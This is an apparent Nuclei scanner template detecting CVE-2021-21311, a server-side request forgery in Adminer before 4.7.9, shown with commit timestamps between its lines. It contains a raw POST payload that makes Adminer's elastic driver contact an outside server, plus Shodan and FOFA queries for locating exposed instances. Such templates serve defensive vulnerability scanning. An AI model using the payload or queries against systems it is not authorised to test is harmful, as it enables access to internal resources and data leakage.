2022-03-31 19:40:06 +00:00
id : CVE-2021-21311
info :
2022-06-27 17:12:31 +00:00
name : Adminer <4.7.9 - Server-Side Request Forgery
2023-03-03 07:28:31 +00:00
author : Adam Crosser,pwnhxl
2022-03-31 19:40:06 +00:00
severity : high
2023-03-13 17:04:41 +00:00
description : Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could lead to unauthorized access to internal resources and potential data leakage.
2023-09-06 12:09:01 +00:00
remediation : Upgrade to version 4.7.9 or later.
2022-03-31 19:40:06 +00:00
reference :
- https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
- https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
2022-05-17 09:18:12 +00:00
- https://packagist.org/packages/vrana/adminer
2022-06-27 17:12:31 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-21311
2023-07-11 19:49:27 +00:00
- https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351
2022-03-31 19:40:33 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.2
2022-03-31 19:40:33 +00:00
cve-id : CVE-2021-21311
cwe-id : CWE-918
2024-04-08 11:34:33 +00:00
epss-score : 0.01485
epss-percentile : 0.85417
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:*
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 6
2023-07-11 19:49:27 +00:00
vendor : adminer
product : adminer
2023-09-06 12:09:01 +00:00
shodan-query : title:"Login - Adminer"
fofa-query : app="Adminer" && body="4.7.8"
hunter-query : app.name="Adminer"&&web.body="4.7.8"
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,adminer,ssrf
2022-03-31 19:40:06 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-03 07:28:31 +00:00
- raw :
2023-03-04 07:09:43 +00:00
- |
2023-03-03 07:28:31 +00:00
POST {{path}} HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2023-03-03 07:53:41 +00:00
auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}
2023-03-04 07:09:43 +00:00
2023-03-03 07:28:31 +00:00
payloads :
path :
- "/index.php"
- "/adminer.php"
- "/adminer/adminer.php"
- "/adminer/index.php"
- "/_adminer.php"
- "/_adminer/index.php"
2022-03-31 19:40:06 +00:00
2023-07-11 19:49:27 +00:00
attack : batteringram
2023-03-03 07:28:31 +00:00
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
redirects : true
max-redirects : 1
2022-03-31 19:40:06 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2023-03-13 17:04:41 +00:00
- "<title>400 - Bad Request</title>"
2023-03-31 00:17:04 +00:00
- "<title>400 - Bad Request</title>"
condition : or
2022-06-27 17:12:31 +00:00
2022-06-28 02:59:30 +00:00
- type : status
status :
2023-03-05 08:39:21 +00:00
- 403
2024-01-26 08:31:11 +00:00
# digest: 4a0a0047304502204671bff084169fc348f8c4837b6a81b74f49e87909f1e780a61bd35749ea8a16022100b98866077226246c174b2cb21ee40adccb717dcf57821c10b00a84b00c03df16:922c64590222798bb761d5b6d8e72950